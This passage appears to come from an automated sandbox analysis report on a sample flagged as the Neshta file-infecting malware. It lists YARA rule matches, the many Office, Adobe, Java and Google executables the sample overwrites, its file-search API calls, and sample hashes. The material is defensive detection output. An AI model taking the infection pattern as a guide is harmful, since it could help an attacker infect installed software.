                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Infects executable files (exe, dll, sys, html)Show sources
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose,0_2_00405080
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose,0_2_00405634
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404F6C FindFirstFileA,FindClose,0_2_00404F6C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0C4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0CC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,0_2_0040F13F
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,0_2_004056A7
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EA04 FindFirstFileA,FindClose,0_2_0040EA04
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EB16 FindFirstFileA,FindClose,0_2_0040EB16
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,0_2_0040EB18
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,0_2_00406D40
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: Z68mMCAxFZ.exe, 00000000.00000003.874643754.0000000002300000.00000004.00000001.sdmpBinary or memory string: _WinAPI_RegisterRawInputDevices.au3

                  System Summary:

                  barindex
                  Potential malicious icon foundShow sources
                  Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
                  Source: Z68mMCAxFZ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  Source: Z68mMCAxFZ.exe, type: SAMPLEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
